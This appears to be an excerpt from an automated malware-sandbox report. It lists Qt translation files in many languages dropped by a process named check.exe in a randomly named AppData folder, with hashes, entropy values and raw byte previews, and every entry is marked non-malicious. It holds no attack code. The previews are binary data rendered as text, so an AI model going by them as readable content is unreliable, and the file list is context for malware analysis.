                                                                                                                                                                                                            Preview:<.d....!..`.......bgB...(.(.......0T......5w... S.Uj......`.......a[....(..........t..............39..........&..........B<s...4..M^..........q...J..%..O5^...O..)^...I..o>...I...J..%.......#....t...A.8dz..$..D ....Z.k.N...<.k.N.......n.......I..............2>...p................G..."...w....................7..,................^............$a....<.6.>..........#...K...........$1.W.b....._Xn......GN...*..~....-..TH.."..!.....5.K.H..#R.........pN..."......&..P.~...@.o.....v..(.........."8..~......s.>.....o.... ..z.q..........................O.h....!t..........e....mi..'.....|.(...@.8.G.8.=.0.B.0. .<.>.6.5. .4.0. .5.,. .G.5. .4.>.:.C.<.5.=.B.0.F.8.O.B.0. .2.A.5. .>.I.5. .A.5. .8.=.4.5.:.A.8.@.0...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........0.1.5.;.5.6.:.0.:..........Note:.....QCLuceneResultWidget.....,. .5.7.C.;.B.0.B.8. .>.B. .B.J.@.A.5.=.5.B.>..........Search Results.....QCLuceneResultWidget....... .
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7444
                                                                                                                                                                                                            Entropy (8bit):4.580794980254807
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:G8oS34B7n303D37Bn3Jso37cfp3Mg3H373R58noct36R9RFu:GQU7ETrxZvqTXLSoct36Pzu
                                                                                                                                                                                                            MD5:66722ED97BCBFD3DAE3C8264413859AB
                                                                                                                                                                                                            SHA1:400A93B213FCF9BBC9785881EA82ADB9F444CD6C
                                                                                                                                                                                                            SHA-256:ECD4283A660F2CF72849B323810D7EADD063120B6F561E05AA1243A5B280946A
                                                                                                                                                                                                            SHA-512:B898BAC9652D7532384ED5CC53FA62DB55D516421D13F815A3E6D5E80AD4C69555F1A7E6C51F8B0A234614824EEE01D6731458F90D40A585990F84A58B9ABE44
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......caB............%.......0T......K:^.....Uj......`.....P..YJ...V.E.4...*...........>...7........B<s.....B\>...6........+.s.....zq.......9.......vR......@.......@.......:....;.8Z....!.g.N......F................t.....D ....z.k.N.......I......^......`#.......2.......G........N...7......N......{..................K...............GN......NO...5.........K.H...@.........pN......V............q..................>...N.........~.....5..%c...:.z.q....i...4....".A.f.e.g.e.i.x. .u.n. .f.i.l.t.r.e..........Add Filter.....FilterNameDialogClass.......N.o.m. .d.e.l. .f.i.l.t.r.e.:..........Filter Name:.....FilterNameDialogClass.......S.e.n.s.e. .t...t.o.l..........Untitled.....QHelp.....`.N.o. .s.'.h.a. .p.o.g.u.t. .c.o.p.i.a.r. .e.l. .f.i.t.x.e.r. .d.e. .c.o.l...l.e.c.c.i...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....H.N.o. .s.'.h.a. .p.o.g.u.t. .c.r.e.a.r. .e.l. .d.i.r.e.c.t.o.r.i.:. .%.1..........Cannot create directory: %1.....QHelpCollect
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15297
                                                                                                                                                                                                            Entropy (8bit):4.708378368926237
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:hmv1gdEYEiNrVhTBvAn1ca1f5lwHoJr0vwuxqsP/5jxA:o1gdEvgbloCof9ixqspW
                                                                                                                                                                                                            MD5:ED228F0F60AE9AEC28AB9171D5AE9590
                                                                                                                                                                                                            SHA1:7F061CF0C699D125A5531E3480C21964452F45EA
                                                                                                                                                                                                            SHA-256:4AC56FC63E400943BAB13F1D4C418502138908E1D488C24AEE6131D3D17552AA
                                                                                                                                                                                                            SHA-512:794CC671C08BFC50980820A6389B9D0D3514619AD0A8F18EFD5554CBBF2482192DF00B9D3B05FEE45F42276E63E2375FB28E193930D426245035B4B0E3E14ED8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......cs_CZB...H.(.......(.......0T......0T......5w...0..Uj......`.......a[......a[....$.......p..........t.......t...........!..1"....T.39....T.39.......s...0......(......7/.................B<s...L..MQ......M^../q..........J..6@.0....*B.O5Q..'..O5^..(A..)Q...X..)^......o>..........+....J..6.......4....t.....8dz..5..D ....R.D ......k.A.....k.A.....k.N.....k.N.......n.."....I..........................2...21......2>..........d.............T..G...4...w...!N......&O......&....!..".......#E..,...,.......)....Q..$/...^..$................$a......6.>.. t......5...K.......K....)......5E.W.b..-.._Xa..%a._Xn..%...GA......GN...?......,9..~.......TH..3..!....*..K.H..4h.........pA...J..pN..........7..P.~.. ..o.....0..(....*..(..........3V..~....T.s.1.....s.>..._.o....0..o....1p.z.q..........'9.....#........^.........h....2................Z..e... .i..8J......(.D.o.v.o.d.e.m. .p.r.o. .t.o. .b.y. .m.o.h.l.o. .b...t.,. .~.e. .d.o.k.u.m.e.n.t.a.c.e. .j.e. .s.t...l.e. .j.e.a.t...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4795
                                                                                                                                                                                                            Entropy (8bit):4.530246422531362
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:X82wNlnKfN1LMFy7LsF3ZqBFZjWo0koBLqBXXjGL0qU7UqB7zoElmP5MUu4DZIHU:XM01f7eOnoB8X2s7Vfg5Mi4beXiOUu
                                                                                                                                                                                                            MD5:1D09BEE1FB55A173F7EB39B9A662A170
                                                                                                                                                                                                            SHA1:C77F0A148262A91679F19689E4790B754D45D5D5
                                                                                                                                                                                                            SHA-256:6BB092552A398687119F6D52145F04BF8373977446D8F00C0DCBD56B96829F0F
                                                                                                                                                                                                            SHA-512:BE5A31A6135E8DB024A8B0EB20C4D8EECBF76861F83FF83B4CA97327DB74AD94BB5D77B4E0A59A33B697C32A4EACD61B8C878951F2C545385C74D99FCE56FEE1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......daB.....%.....m.0T......Uj....V.`....................k.B<s.....B\>..........6.+.s...............t.....D ....|.k.N...9...I...O..2.......G....B...N...O..............!..K...._..........GN...........@.K.H.............pN..............>.....~.....m..%c.....z.q....i..........U.n.a.v.n.g.i.v.e.t..........Untitled.....QHelp.....D.K.a.n. .i.k.k.e. .k.o.p.i.e.r.e. .s.a.m.l.i.n.g.s.f.i.l.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....6.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .m.a.p.p.e.n.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....V.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .i.n.d.e.k.s.t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1...........&Cannot create index tables in file %1......QHelpCollectionHandler.....J.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....P.K.a.n. .i.k.k.e. .i.n.d.l...s.e. .s.q.l.i.t.e.-.d.a.t.a.b.a.s.e.-.d.r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7570
                                                                                                                                                                                                            Entropy (8bit):4.550982634910665
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:8y/gPmmhL/7LlSivP6kBL7jb0RNUzzpld4UGG3Ik18fLP0L7fGc0OeVP8a8hiAwj:1OD7hx/Bv3oNuFX4iqgv34fZsu
                                                                                                                                                                                                            MD5:3B070D169E3381E2FB081172934AAD00
                                                                                                                                                                                                            SHA1:70886EB7EF566B296D0814BD4C2440AC176699D6
                                                                                                                                                                                                            SHA-256:9962523FBAE9F1E4C3B5C3C16860D059291CB30DC5EBE5A5EDA4C836A03FED1E
                                                                                                                                                                                                            SHA-512:271B730B5A7358E923BBBC6FA074A72DA52FA47E3B7726779EF7034200EDA09BF0E1AE4E7B11B59F76805F48DC285F6EFC245EB9C7F4A748BE82B25CEE1DDCAE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......deB..........B.%.....5.0T......K:^.....Uj....?.`.....f..YJ...V.E.4...............>............B<s...z.B\>...\........+.s...Q.zq....C..9....4..vR...B..@.......@.......:......8Z......g.N......F....>...........t.....D ......k.N.......I......^....|.`#....I..2....<..G....^...N.........................;..........K....y..........GN......NO...........,.K.H.............pN......V...................."..........>.............~........%c.....z.q....i........".F.i.l.t.e.r. .h.i.n.z.u.f...g.e.n..........Add Filter.....FilterNameDialogClass.....".N.a.m.e. .d.e.s. .F.i.l.t.e.r.s.:..........Filter Name:.....FilterNameDialogClass.......O.h.n.e. .T.i.t.e.l..........Untitled.....QHelp.....\.D.i.e. .K.a.t.a.l.o.g.d.a.t.e.i. .k.a.n.n. .n.i.c.h.t. .k.o.p.i.e.r.t. .w.e.r.d.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....\.D.a.s. .V.e.r.z.e.i.c.h.n.i.s. .k.a.n.n. .n.i.c.h.t. .a.n.g.e.l.e.g.t. .w.e.r.d.e.n.:. .%.1..........Cannot create directory: %
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):4.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                            MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                            SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                            SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                            SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10704
                                                                                                                                                                                                            Entropy (8bit):4.481291573289571
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:q9J9j7e4BQhD0h61nnKz+DJF/45ojDU9V1Wa/rmtIBMH:Wp64ShDnnKz+FhjQpWa/ytoMH
                                                                                                                                                                                                            MD5:9EDF433AB9EE5FC7CF7782370150B26A
                                                                                                                                                                                                            SHA1:A918AE15A0DF187C7789BE8599A80E279F039964
                                                                                                                                                                                                            SHA-256:FD16B279F8CF69077F75E94D90C9C07A2AFFF3948A579E3789F5FFB5E5F4202D
                                                                                                                                                                                                            SHA-512:88245F6FBAAF603A03D7EA2341411AE040791D47C9FF110C6D6CDD8165F0A8BA7A4A0DA5CD543BBE95A4E93FE3A81E95B3664E00C11791FBCB4923E3A80ABC60
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......es_ESB...(.(.....7.0T..../.5w... C.Uj......`.......a[....0..........t..............39..........&e.........B<s...D..M^..............J..%p.O5^...I..)^...1..o>.......J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>....................G...#...w............!.......%..,................^............$a......6.>..........#...K...........$C.W.b....._Xn......GN...|..~.......TH.."..!.....5.K.H..#f.........pN...j......'..P.~... .o........(....>....."<..~....c.s.>.....o.... ..z.q..........................u.h....!p.......*..e....Qi..'}......(.L.a. .r.a.z...n. .d.e. .e.s.t.o. .p.u.e.d.e. .s.e.r. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n. .e.s.t... .s.i.e.n.d.o. .i.n.d.e.x.a.d.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....2.R.e.s.u.l.t.a.d.o.s. .d.e. .l.a. .B...s.q.u.e.d.a..........Search Results.....QCLu
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10922
                                                                                                                                                                                                            Entropy (8bit):4.459946393010639
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:w4BIn67/WsmoB3r6M/eYlSbyE7DnvE7pcn9nPJZe7nOFovzcNn7Uhmio+2/p53I/:w4N19fq3n2c9Bucuhmi52/X3Qpam
                                                                                                                                                                                                            MD5:D520C7F85CC06C66715A2B6622BF0687
                                                                                                                                                                                                            SHA1:47292D068172FBC9DC0D9BE2F479E890A37CE138
                                                                                                                                                                                                            SHA-256:687E351C062F688AAFF6CF05218D6017B80B1A1B4238D1D30250A55EE41C5FED
                                                                                                                                                                                                            SHA-512:736B50BB64751B127300BCAFE88888A9D9A2081CBF934EDCFFEF6CEF0575505AFDF714273A97671ABB598AE3D23C8E55F7DCD632FB0AA219ED5F763768576E04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fr_FRB...(.(.....y.0T....K.5w...!1.Uj....*.`.......a[............5..t..............39....m.....'W.......S.B<s...d..M^.. ...........J..&`.O5^...+..)^......o>.......J..&.......$....t.....8dz..%..D ......k.N.....k.N...D...n.......I...........c..2>..........M.........G...$...w....K..................,................^............$a......6.>...c......$...K....'......%M.W.b....._Xn...j..GN......~.......TH..#..!.......K.H..$Z......,..pN..........'..P.~.....o........(....h.....#4..~......s.>...M.o....!..z.q...........p......L.........h...."^.......b..e.....i..(W......(.I.l. .e.s.t. .p.o.s.s.i.b.l.e. .q.u.e. .c.e.l.a. .s.o.i.t. .d... .a.u. .f.a.i.t. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.t.i.o.n. .e.s.t. .e.n. .c.o.u.r.s. .d.'.i.n.d.e.x.a.t.i.o.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.e. .:..........Note:.....QCLuceneResultWidget.....2.R...s.u.l.t.a.t.s. .d.e. .l.a. .r.e.c.h.e.r.c.h.e.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10891
                                                                                                                                                                                                            Entropy (8bit):4.5087667371046205
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Im7gBZHx4hCTNarW6EJDvoIR765f40wqNcMi/8F/Ihon:v0fHccarW6Eh61wqNcMi/Q/won
                                                                                                                                                                                                            MD5:B62C74793741FC386332A59113E8D412
                                                                                                                                                                                                            SHA1:589CE099F2C1D92581B5CF0E17BE49A2BF0014D4
                                                                                                                                                                                                            SHA-256:7399A248609974773F60866C87B78EA7DFBC4F750313D692F7886CD763883C9F
                                                                                                                                                                                                            SHA-512:D8E1A3B3732662BA572A1387651F2625742710834BEDB41809DA47B5D23020AA1B558B64A00C10C605D1844F0544483163F4A6227CAFFA5ECDABF3BBF4E12D9B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......gl_ESB...8.(.......0T......Uj......`.....`.a[....F..........t..............1"... S.39.......s...!.............'F.........B<s...8..MQ.. ...........J..&S.0.....x.O5Q......)Q...O..o>...{.......#...J..&.......$....t.....8dz..%..D ......k.A.....k.A.......n.......I.................."...21....................G...#...w............[...!...?...........Q...?........$a....v.6.>..........$...K...........%0._Xa......GA...n..........~.......TH..#..K.H..$M.........pA...Z......'..P.~...B.o........(..........#+..~......s.1.....o....!..z.q...e.............................. ..e....wi..((......(.A. .r.a.z...n. .d.i.s.t.o. .p.o.d.e. .s.e.r. .q.u.e. .a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n.d.a. .e.s.t.e.a. .a. .i.n.d.e.x.a.r.s.e...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....*.R.e.s.u.l.t.a.d.o.s. .d.a. .p.r.o.c.u.r.a..........Search Results.....QCLucene
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10284
                                                                                                                                                                                                            Entropy (8bit):4.674501432335502
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:RNY+rCG3e7LBqYqYseBb/FEWBgSn62TdJgDO9esYGY3DtgGh621XlZ/8kWvIMK:4+rheHYYZdBb/pgSn62T/FeVD3DGGh62
                                                                                                                                                                                                            MD5:5A56E9E2ED6ECE3F249D1C2A7EB3B172
                                                                                                                                                                                                            SHA1:D6F079F40FBB813B0293C1D2210BAE7084092FEC
                                                                                                                                                                                                            SHA-256:70F33B569C2942F41C6D634EA6A61CB8D80EB2C7011BAD48EF6DBAE9677960D5
                                                                                                                                                                                                            SHA-512:28947128FC51791CFDBFD3958FAF9B33979DB52C90AE0159EDB01FE6032284EB37BC05187162983A0435560BCEA864B008F499CDB4CE662792599FE20A37972A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......hu_HUB...(.(.......0T......5w......Uj......`.....4.a[....N..........t....".........39..........%..........B<s...8..M^...8..........J..$..O5^......)^...]..o>.......J..$......."N...t.....8dz..#g.D ......k.N...>.k.N.......n.......I..............2>..........a.........G...!...w.......................,................^............$a......6.>.........."...K....m......"..W.b...l._Xn...~..GN......~.......TH..!F.!.......K.H..!..........pN..........%..P.~...<.o........(.......... ...~......s.>...{.o.....c.z.q...K.......v......l.........h.... ........t..e....mi..%.....~.(.E.z. .a.m.i.a.t.t. .l.e.h.e.t.,. .h.o.g.y. .a. .d.o.k.u.m.e.n.t...c.i... .m...g. .i.n.d.e.x.e.l...s. .a.l.a.t.t. .v.a.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......M.e.g.j.e.g.y.z...s.:..........Note:.....QCLuceneResultWidget.....&.K.e.r.e.s...s.i. .e.r.e.d.m...n.y.e.k..........Search Results.....QCLuceneResultWidget.......A
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10612
                                                                                                                                                                                                            Entropy (8bit):4.458970627057882
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:nRxcfy71b+myBN16cbc+w45rtlTnzo7uHp3JQJ9cVu4BJ1G82g33vOVrNL/7nEF1:RR4R/fJn9JizTgnqrNL/b0hH2K
                                                                                                                                                                                                            MD5:3639B57B463987F6DB07629253ACD8BF
                                                                                                                                                                                                            SHA1:65935A67C73F19FCF6023FB95030A5ACAF9DA21C
                                                                                                                                                                                                            SHA-256:316FE8D0815E2B4B396895BEB38EF1A40431915B5E054DF80F4C0CD556F26E4B
                                                                                                                                                                                                            SHA-512:AD7CA93D93A69F273CE80BE7F2F477543B9C5F9C7E4D7448223BFF084EA956B626D6837F22D83C5E282688B938F58C29073C4B5C6F26A797F716C14FABF9FFEE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......it_ITB...(.(.....g.0T....y.5w... ..Uj....2.`.......a[............'..t..............39..........&..........B<s...j..M^...h......K...J..%..O5^...K..)^......o>...u...J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>.................o..G..."...w............-......./..,................^...'........$a......6.>..........#...K...........$..W.b....._Xn......GN......~.......TH.."n.!.....5.K.H..#"......>..pN..........&..P.~.....o.....~..(....p.....!...~....A.s.>.....o.... ..z.q..........................q.h....!0.......*..e....;i..'!......(.L.a. .c.a.u.s.a. .d.i. .c.i... .p.o.t.r.e.b.b.e. .e.s.s.e.r.e. .c.h.e. .l.'.i.n.d.i.c.i.z.z.a.z.i.o.n.e. .d.e.l.l.a. .d.o.c.u.m.e.n.t.a.z.i.o.n.e. ... .a.n.c.o.r.a. .i.n. .c.o.r.s.o...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.......R.i.s.u.l.t.a.t.i. .d.e.l.l.a. .r.i.c.e.r.c.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7917
                                                                                                                                                                                                            Entropy (8bit):5.680408580146589
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:mP6J37GcBzRjYEPEJJGTnwfJJxb7FTPjzzZBL3/q/I53:mSVqclR5s6Tnwfb7Pj/PL3/q/w3
                                                                                                                                                                                                            MD5:1380A9352C476071BDA5A5D4FED0B6C5
                                                                                                                                                                                                            SHA1:9B737ED05F80FE5D3CD8F588CCEC16BB11DD3560
                                                                                                                                                                                                            SHA-256:AE603B2C0D434D40CDE433FFCBA65F9EE27978A9E19316007BE7FE782A5B8B47
                                                                                                                                                                                                            SHA-512:EC3D68126488C3A163898BACAF7E783217868573635182CAF511ED046B4BE1F99A71FBB24DA607CCB50EDAF70893007AAEE9A6BAAE4C1CD33465A0915AA965DA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......jaB...(.(.....S.0T......5w....'.Uj......`.......a[............u..t............!.39.....................B<s......M^..............J...>.O5^...O..)^......o>.......J...............t...w.8dz.....D ......k.N.....k.N...H...n.......I...........i..2>...<......G......9..G....P..w............i..........,................^..........'.$a......6.>...5..........K............S.W.b...2._Xn......GN...@..~.......TH.....!.......K.H.............pN...........S.P.~.....o.....|..(..............~....o.s.>.....o.......z.q..................@.........h.....&....... ..e.....i........@.(0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0K0.0W0.0~0[0.0..).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..:..........Note:.....QCLuceneResultWidget......i.}"}Pg...........Search Results.....QCLuceneResultWidget.....R0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0.i.}"}Pg.0LN.[.Qh0jS..`'0L0B0.0~0Y0..........VThe search results may
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5708
                                                                                                                                                                                                            Entropy (8bit):5.698914195742074
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:elPQHJ6L4c7LaQaFQv2QEhBL+Ejma0W40U0BzlQlcrnUSaTIdspIc18CLRSM3LBY:dHI97W1BbNz1VqqzJpoj5y5uY7OGrWFE
                                                                                                                                                                                                            MD5:CD15674A652C2BF435F7578E119182F8
                                                                                                                                                                                                            SHA1:AEA22E4A0D21396733802C7AB738DDD03737B7D6
                                                                                                                                                                                                            SHA-256:F11C64694E8E34E1D2C46C1A1D15D6BA9F2DB7B61DE4FDF54ECA5AB977C3E052
                                                                                                                                                                                                            SHA-512:88BFA112F4DBC0BFB4013CE0937E5180B4AB4A217FC8A963798C7C86532E794E4A1AD88416AE42F26A1C0631B465A5D69BFE75366E048502F5E21F4115A12F19
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......koB............%.......0T......K:^...g.Uj......`........YJ...>.E.4...........z...>..........;.B<s...K.B\>...b........+.s.....zq....[..9....F..vR......@.......@.......:....c.8Z......g.N...7..F....|...........t.....D ......k.N.......I...m..^......`#....!..2.......G....@...N.................................X..K....{.......i..GN......NO.............K.H..........S..pN...z..V...............................>...........:.~.....i..%c.....z.q....i...s......D.0. .............Add Filter.....FilterNameDialogClass.......D.0. .t...:..........Filter Name:.....FilterNameDialogClass........... ...L..........Untitled.....QHelp.....(...L... ...|.D. .....`. ... ...L.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....".....0...|. .... ... ...L.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....2...|. .%.1... ...x. .L.t...D. .... ... .................&Cannot create index tables in file %1......QHelpCollectionHandler.....,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9673
                                                                                                                                                                                                            Entropy (8bit):4.622652249027856
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:TO/7kBL9wGu3wtCnlhLJUBB7oph+mZ18LgP:T8QnwcCnlhdvphpZ18LgP
                                                                                                                                                                                                            MD5:2B68446B69D9AA40B273D75A581D2992
                                                                                                                                                                                                            SHA1:8A09BD38998543B74E2673478EDD54FB4BBDD068
                                                                                                                                                                                                            SHA-256:CC6CB4D8C54086224672F2E49E623C8CB7C0C1CD65B8D5ECD42FC9BA3A6065BD
                                                                                                                                                                                                            SHA-512:F3A3D6A416B3411613B06FC3EE56625D4D4DE80087182AB0D0601E49314861ABEF97D11A15B4C0511911544A59FBC4A4A52F0CCF0FD43F763A76A8922D8E57B6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......plB.....(.......0T....T.5w......Uj... R.`.......a[...............t............2.39....H......6.......n.B<s.. ...M^..._......6.O5^...F..)^......o>...............t.....D ......k.N.....k.N.../...n.......I...W..........2>...w................G.......w............&.......:..,................^...(..... ..$a....?.6.>...$..........K......W.b....._Xn......GN...Y..~......!.....*.K.H...E....."...pN...-.........P.~...}.o........(....1..~......s.>......%c.."..o.....r.z.q............................h................e.....i..#.......N.i.e.n.a.z.w.a.n.y..........Untitled.....QHelp.....P.N.i.e. .m.o.|.n.a. .s.k.o.p.i.o.w.a... .p.l.i.k.u. .z. .k.o.l.e.k.c.j...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....>.N.i.e. .m.o.|.n.a. .u.t.w.o.r.z.y... .k.a.t.a.l.o.g.u.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....H.N.i.e. .m.o.|.n.a. .u.t.w.o.r.z.y... .t.a.b.e.l. .w. .p.l.i.k.u. .%.1........... Cannot create tables in file
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7288
                                                                                                                                                                                                            Entropy (8bit):5.297177914619657
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:dBJjvfq7D6X68uBAzlp5W9+yBPZZZMM7vL0PXJL:JKrMEL0PXJL
                                                                                                                                                                                                            MD5:794AF445A5D7082D51BD22683449F86D
                                                                                                                                                                                                            SHA1:3A0C369872B112A1572AA17EEB814B168B225D98
                                                                                                                                                                                                            SHA-256:557B644E6DA5F1EC720EF93965617087E4D1F40B2494CC5AA524CF3796108DE7
                                                                                                                                                                                                            SHA-512:D42C870A16AEE7626BBE24886AD423895529A2F1A51AC2DBC303BC0E4EF9D3241FE894ECA3F7217AD408C8DCEE165CA4B89D84570357B0EB80340A3F72B0A846
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
